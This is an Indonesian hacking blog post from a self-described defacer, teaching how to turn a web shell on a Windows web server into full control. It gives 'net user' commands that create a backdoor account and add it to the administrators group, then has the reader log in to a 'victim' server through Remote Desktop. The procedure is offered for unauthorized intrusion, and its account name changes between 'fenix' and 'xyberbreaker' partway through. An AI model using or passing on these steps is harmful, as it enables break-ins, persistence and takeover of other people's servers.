Jumat, 03 Mei 2013

Remote Windows Server Menggunakan Remote Desktop Connection

Hellooo Guys. Oke kali ini mau kasih tutorial yang cukup mudah ini. Karena saya bosan dengan dengan kegiatan saya seperti kegiatan deface ... maka saya coba coba cari tutorial cara hack komputer dengan ip addres. Akhirnya nemu juga nih, Langsung saja.

Remote Dekstop Connection merupakan software bawaan dari windows yang digunakan untuk meremote komputer. Kali ini kita coba untuk meremote web server yang berbasis windows. Masih sama seperti artikel sebelumnya, dalam tutorial kali ini, kita membutuhkan shell. Berikut merupakan langkah-langkahnya:

Buka shell yang sudah anda buat sebelumnya. Jalankan perintah “net user” untuk melihat daftar user yang ada dalam web server tersebut Kemudian jalankan perintah “net user fenix fenix!!! /add”  fenix merupakan username fenix!!! merupakan password /add merupakan perintah untuk membuat account baru berdasarkan data tersebut jika berhasil, akan ada pesan “The command completed successfully.” Lalu, cek lagi menggunakan perintah “net user” , jika sudah ada, kita masuk ke tahap berikutnya Account sudah dibuat, sekarang kita tambahkan account tersebut ke group administrator,  kita gunakan perintah “net localgroup administrators xyberbreaker /add”.  Jika berhasil, akan keluar pesan “The command completed successfully.”

Sekarang kita coba remote menggunakan RDC.
Masuk ke Start->All Programs -> Accessories -> Communications -> Remote Dekstop ConnectionKlik Options >>
Computer: isi dengan alamat web server misal:victim.net Username: isi dengan username pada account yang sudah kita buat  Password: isi dengan password pada account yang sudah kita buat Jika sudah, klik connect, beberapa saat kemudian, anda akan logon di web server target dan anda sudah ada di dalam server tersebut. selanjutnya aanda yang menetukan. Namun jika gagal, kemungkinan besar web server tersebut tidak memberi izin kepada komputer lain untuk melakukan remote.

Artikel Terkait

0   Comment

Posting Komentar

Hanya Untuk BlogWalking !

No Spam !

Cancel Reply